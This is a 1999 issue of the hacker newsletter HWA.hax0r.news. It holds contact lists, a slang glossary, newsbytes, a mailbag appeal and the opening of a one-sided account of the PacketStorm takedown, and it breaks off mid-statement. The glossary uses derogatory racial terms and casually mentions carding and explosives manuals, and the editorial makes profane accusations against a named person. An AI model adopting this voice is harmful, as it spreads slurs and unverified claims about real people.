[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
  [=HWA'99=]                        Number 23 Volume 1 1999 July 4th 99
==========================================================================
                   [ 61:20:6B:69:64:20:63:6F:75: ]
             [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
             [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

"I have received more death threats in the last 24 hours by phone, than
I have in five years," - John Vranesevich aka JP (AntiOnline)

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.harvard.edu/hwahaxornews/ * DOWN *
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
                   Welcome to HWA.hax0r.news ... #23
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by
and idle a while and say hi...

*******************************************************************
***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you it's for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
                               Issue #23
=--------------------------------------------------------------------------=

                               [ INDEX ]
=--------------------------------------------------------------------------=
    Key     Intros
=--------------------------------------------------------------------------=

    00.0 .. COPYRIGHTS
    00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
    00.2 .. SOURCES
    00.3 .. THIS IS WHO WE ARE
    00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
    00.5 .. THE HWA_FAQ V1.0

=--------------------------------------------------------------------------=
    Key     Content
=--------------------------------------------------------------------------=

    01.0 .. GREETS
    01.1 .. Last minute stuff, rumours, newsbytes
    01.2 .. Mailbag
    02.0 .. From the Editor
    AA.A .. SPECIAL: AntiOnline's JP pulls the plug on PacketStorm Security
    03.0 .. Cable Modem Hijacking from www.hackcanada.com
    04.0 .. Exploiting Null Session Weaknesses in NT environment
    05.0 .. Cognos PowerPlay Web Edition security vulnerability allows
            access to data cubes
    06.0 .. VMware Security Alert
    07.0 .. Security vulnerability in hustler.com login template
    08.0 .. DOD investigating computer 'Mob-like' tactics
    09.0 .. GSA announces Intrusion Detection Net
    10.0 .. Nasa servers reportedly hacked
    11.0 .. UK May Force ISPs to Install Taps
    12.0 .. Crypto Tie Downs Loosened
    13.0 .. Heathen.A Spreads Through Word Files
    14.0 .. $950 for a Log File Analysis Tool
    15.0 .. Youth Charged With $20,000 in Damages
    16.0 .. Army Fights Online Battle And Looses
    17.0 .. Welfare Reform Law Invades Privacy of US Citizens
    18.0 .. GSM Mobile Security is Cracked
    19.0 .. Microsoft Mono-culture Poses National Security Risk
    20.0 .. BugTraq Moves To SecurityFocus
    21.0 .. MS Gives Out Pirate Dough
    22.0 .. Biometrics comes to Home Shopping
    23.0 .. Palm VII Revealed
    24.0 .. Who Is HNN?
    25.0 .. AntiOnline on the trail of f0rpaxe
    26.0 .. Critical NOAA Web Site Attacked
    27.0 .. Back Orifice 2000 is on its Way
    28.0 .. Support for Web Security Spec Announced
    29.0 .. Pentagon Investigates Computer Security Breech
    30.0 .. What will the Next Generation of Viruses Bring?
    31.0 .. DIRT still Around, Used by Law Enforcement
    32.0 .. Debit Cards Not Safe on the Internet
    33.0 .. New Definition of 'Computer Hacker'
    34.0 .. Hackers In the Workplace
    35.0 .. NPR Covers .gov/.mil Defacements.
    36.0 .. Australia Passes Major Net Censorship Law
    37.0 .. Hacker crackdown, is your nick on this list??

=--------------------------------------------------------------------------=

    RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked
             websites)

    AD.S  .. Post your site ads or etc here, if you can offer something in
             return thats tres cool, if not we'll consider ur ad anyways so
             send it in. ads for other zines are ok too btw just mention us
             in yours, please remember to include links and an email contact.
             Corporate ads will be considered also and if your company wishes
             to donate to or participate in the upcoming Canc0n99 event send
             in your suggestions and ads now...n.b date and time may be
             pushed back join mailing list for up to date information.
             Current dates: Aug19th-22nd Niagara Falls...

    HA.HA .. Humour and puzzles

             Hey You!
             =------=
             Send in humour for this section! I need a laugh and its hard to
             find good stuff... ;)

    SITE.1 .. Featured site,
    H.W   .. Hacked Websites
    A.0   .. APPENDICES
    A.1   .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).
Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE
NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE
DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected.
News is news so i'll print any and all news but will quote sources when
the source is known, if it's good enough for CNN it's good enough for me.
And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

    HWA NEWS
    P.O BOX 44118
    370 MAIN ST. NORTH
    BRAMPTON, ONTARIO
    CANADA
    L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
         mention in the zine, send in a postcard, I realize that some places
         it is cost prohibitive but if you have the time and money be a cool
         dude / gal and send a poor guy a postcard preferably one that has
         some scenery from your place of residence for my collection, I
         collect stamps too so you kill two birds with one stone by being
         cool and mailing in a postcard, return address not necessary, just
         a "hey guys being cool in Bahrain, take it easy" will do ... ;-)
         thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
  fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)         Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq.
I've been archiving this list on the web since late 1993. It is
searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting
their vulnerabilities. It is about defining, recognizing, and preventing
use of security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter. I will
allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential
"noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the
words that you post on this list and that reproduction of those words
without your permission in any medium outside the distribution of this
list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send
a blank message to crypto-gram-subscribe@chaparraltree.com. To
unsubscribe, visit http://www.counterpane.com/unsubform.html.
Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an
inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on
the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                            ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck  ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it
will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you
   count paying taxes ... in which case we work for the gov't in a BIG
   WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of
   recent news events it's a good idea to check out issue #1 at least
   and possibly also the Xmas issue for a good feel of what we're all
   about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeonholed with those 'dumb
leet (l33t?) dewds' this is the state of affairs. It ain't Stephen
Levy's HACKERS anymore. BTW to all you up and comers, i'd highly
recommend you get that book.
It's almost like buying a clue. Anyway..on with the show ..
- Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny the any
possible attempts at eschewing obfuscation by obscuring their actual
definitions.

@HWA    - see EoA ;-)

!=      - Mathematical notation "is not equal to" or "does not equal"
          ASC(247) "wavey equals" sign means "almost equal" to. If
          written an =/= (equals sign with a slash thru it) also means
          !=, =< is Equal to or less than and => is equal to or greater
          than (etc, this aint fucking grade school, cripes, don't
          believe I just typed all that..)

AAM     - Ask a minor (someone under age of adulthood, usually <16, <18
          or <21)

AOL     - A great deal of people that got ripped off for net access by a
          huge clueless isp with sekurity that you can drive buses
          through, we're not talking Kung-Fu being none too good here,
          Buy-A-Kloo maybe at the least they could try leasing one??

*CC     - 1 - Credit Card (as in phraud)
          2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC     - Chaos Computer Club (Germany)

*CON    - Conference, a place hackers crackers and hax0rs among others go
          to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
          gear, get drunk watch videos and seminars, get drunk, listen to
          speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
               hacker speak he's the guy that breaks into systems and is
               often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice
               dip, I like jalapeno pepper dip or chives sour cream and
               onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger
          Vanilla Ice is a wigger, The Beastie Boys and rappers speak
          using ebonics, speaking in a dark tongue ... being ereet, see
          pheer

EoC     - End of Commentary

EoA     - End of Article or more commonly @HWA

EoF     - End of file

EoD     - End of diatribe (AOL'ers: look it up)

FUD     - Coined by Unknown and made famous by HNN - "Fear uncertainty
          and doubt", usually in general media articles not high brow
          articles such as ours or other HNN affiliates ;)

du0d    - a small furry animal that scurries over keyboards causing
          people to type weird crap on irc, hence when someone says
          something stupid or off topic 'du0d wtf are you talkin about'
          may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see
          HAX0R

*HAX0R  - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
              is difficult to define, I think it is best defined as pop
              culture's view on The Hacker ala movies such as well erhm
              "Hackers" and The Net etc... usually used by "real" hackers
              or crackers in a derogatory or slang humorous way, like
              'hax0r me some coffee?' or can you hax0r some bread on the
              way to the table please?'
          2 - A tool for cutting sheet metal.

HHN     - Maybe a bit confusing with HNN but we did spring to life around
          the same time too, HWA Hax0r News.... HHN is a part of HNN ..
          and HNN as a proper noun means the hackernews site proper.
          k? k. ;&

HNN     - Hacker News Network and its affiliates
          http://www.hackernews.com/affiliates.html

J00     - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC     - Depends on context: No Further Comment or No Fucking Comment

NFR     - Network Flight Recorder (Do a websearch) see 0wn3d

NFW     - No fuckin'way

*0WN3D  - You are cracked and owned by an elite entity see pheer

*OFCS   - Oh for christ's sakes

PHACV   - And variations of same
          Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups
          Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking
                      C - Cracking
                      V - Virus
                      W - Warfare
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook
                          etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

*PHEER  - This is what you do when an ereet or elite person is in your
          presence see 0wn3d

*RTFM   - Read the fucking manual - not always applicable since some
          manuals are pure shit but if the answer you seek is indeed in
          the manual then you should have RTFM you dumb ass.

TBC     - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA     - To Be Arranged/To Be Announced also 2ba

TFS     - Tough fucking shit.

*w00t   - 1 - Reserved for the uber ereet, no one can say this without
              severe repercussions from the underground masses. also
              "w00ten"
          2 - Cruciphux and sAs72's second favourite word (they're both
              shit stirrers)

*wtf    - what the fuck

*ZEN    - The state you reach when you *think* you know everything (but
          really don't) usually shortly after reaching the ZEN like state
          something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back)
Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security
pr0xy Astral

Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

and the #innerpulse, crew (innerpulse is back!) and some inhabitants of
#leetchans .... although I use the term 'leet loosely these days, ;)

kewl sites:

+ http://www.securityfocus.com NEW
+ http://www.hackcanada.com
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN ********* SEE AA.A
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't
always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

++ Help Net Security is Moving.
   contributed by BHZ

   Help-net Security, an HNN Affiliate is moving to a new server.
   Unfortunately they have encountered a few problems with transferring
   the domain. So net-security.org could be unfunctional for up to 5
   days. In the mean time you can reach HNS at http://hns.crolink.net

   Help-net Security - Old URL
   http://net-security.org

   Help-net Security - New URL
   http://hns.crolink.net

++ TECHNO BRA CALLS THE COPS (TECH. 3:00 am Jul 1st)
   http://www.wired.com/news/news/email/explode-infobeat/technology/story/20517.html

   A security bra monitors the wearer's heart rate to sense danger. When
   activated, it relays her location to the cops and helps them make a
   bust. By Leander Kahney.

++ ALLEN BUYS ANOTHER CABLE SHOP (BUS. 9:00 am Jul 1st)
   http://www.wired.com/news/news/email/explode-infobeat/business/story/20528.html

   Paul Allen takes another step towards becoming master of his own
   "wired world" with the US$3.1 billion acquisition of Bresnan
   Communications, a Midwest cable operator.

++ WAITING FOR WAP (TECH. 3:00 am Jul 1st)
   http://www.wired.com/news/news/email/explode-infobeat/technology/story/20521.html

   Supporters say the Wireless Access Protocol promises to bring Web
   services to tiny cell-phone screens. But when? Chris Oakes reports
   from San Francisco.

++ APACHE NOW IN GOOD COMPANY (TECH. Wednesday)
   http://www.wired.com/news/news/email/explode-infobeat/technology/story/20506.html

   The free Web server that has always had the lion's share of the
   market now has a corporation behind it. The nonprofit company is
   being run by Apache's founding fathers.

++ SORRY, WRONG NUMBER (WRLD Wednesday)
   http://www.wired.com/news/news/email/explode-infobeat/story/20509.html

   Manhattanites take pride in their 212 area code, a distinctive symbol
   of living in The Most Important Place on Earth. But starting
   Thursday, some of them are going to have to adjust to life without
   212, when Bell Atlantic begins issuing 646 area codes to new phone
   subscribers in Manhattan. The move, necessitated by too many phone
   numbers, is not going down too well, although former New York Mayor
   Ed Koch expects the grousing to stop after an adjustment period.
   Besides, residents of Gotham will still hold on to all the other
   perks that make living there such a joy: astronomical rents,
   overpriced restaurants, and living cheek-by-jowl with one another.

++ ZEROING IN ON CELL-PHONE 911S (TECH. Wednesday)
   http://www.wired.com/news/news/email/explode-infobeat/technology/story/20504.html

   New technology will pinpoint a mobile-phone user's location to within
   5 feet -- a potential lifesaver in 911 calls. But watchdogs say the
   data will inevitably be within the reach of snoops. By Chris Oakes.
Mucho thanks to Spikeman for directing his efforts to our cause of
bringing you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-=-

From: "Whimsies & Company"
To:
Subject: Please support Justice and Free Speech
Date: Thu, 1 Jul 1999 19:18:02 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3

Dark Modem DOWN For Emergency ACTION

OK, two issues:

1) the following message has been sent to a TARGETED audience. We have
   walked a thin line between targeted mailing and spam. If we get even
   one complaint, we will stop.

2) It cannot be confirmed that any unusual activity has occurred on the
   antionline network in the past 24 hours *grin* therefore we have
   taken that statement out of the message.

Again, we do NOT advocate spamming, we only want people who might be
interested in this issue to be aware, so use DISCRETION when sending any
mail.

This is an emergency email message from Dark Modem
(http://www.darkmodem.org). Yesterday (June 30, 1999), Packet Storm
Security was taken offline after John Vranesevich sent an email to
Harvard University about the JP section that was on the site. Some
suspect it was really jealousy and animosity toward Ken Williams that
drove JP to commit this offensive act. Packet Storm was in direct
competition with antionline and essentially blew antionline out of the
water in every category. It is this author's belief, therefore, that JP
was trying to protect his "marketshare" (something that Ken Williams
would never have done, since he was not in it for money).
Please show your support by mentioning this topic on your website, forwarding this email to "whom it may concern", and sending email in support of Ken and PSS to Harvard and antionline.

================================================================

@HWA

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

     #include
     #include
     #include

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      *Otay buttwheat, here's #23 it might not be as bulging in the
      *pantal area as #22 but it should be a little cleaner (or not)
      *we've had some people coming into the IRC channel on EFNET and
      *just parting, maybe you're just scanning the nicks, but hey we
      *don't bite come and hang out, maybe chat about some of the shit
      *thats going down with Packetstorm or why 2600 is $7.15 in Canada
      *does Eric hate Canadians or whats the story?
      *
      *... who the fuck does JP think he is? fucking with PSS
      *there goes a ton of Ken's work down the drain...fuck AntiOnline!
      *(Read section AA.A)
      *
      *anyway enjoy this issue and shouts out to HackCanada..and Ken
      *Williams ..
      *
      *
      */
      printf ("EoF.\n");
      }

Issue #23, rocking your sysadmin and hax0r asses in 99...

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

@HWA

AA.A AntiOnline's JP causes the plug to be pulled on PacketStorm by Harvard
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th AM a Call from John Vranesevich (aka JP) of AntiOnline to Harvard started off an avalanche of events that culminated in the plug being pulled at packetstorm.harvard.edu. Along with personal data it was initially reported that the entire site was lost, this may now not be the case. Included here are statements from JP, Harvard, Ken Williams and stories from Attrition.org, HNN (http://www.hackernews.com) and other sources....
read the sordid story below - Ed

(At this time it is uncertain whether Ken does or does not have backups of his PacketStorm site available to him but some people on the net have taken it upon themselves to begin a new mirror and are calling for people that have downloaded from the site to re-upload the files to the following url; http://packetstorm.nl.linux.org/ - Ed )

From: Ken Williams
X-Sender: jkwilli2@ultra3-100lez.eos.ncsu.edu
To: The Usual Suspects: ;
Date: Thu, 1 Jul 1999 02:17:40 -0400 (EDT)

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

I just got off the phone (6/30/99 PM) with one of the Harvard Network managers. John Vranesevich, of www.AntiOnline.com, contacted Harvard this morning and threatened to sue them because of the content in the jp/ directory of the Packet Storm Security web site that was located at http://packetstorm.harvard.edu, and before that at http://packetstorm.genocide2600.com (see www.attrition.org for details about this info). I was told that the situation quickly escalated to the Harvard Office of General Counsel.

John Vranesevich claims that I was using the server as a platform to harass and threaten him, his family, and his business. Nothing could be further from the truth. I ran a network security related web site and archive!

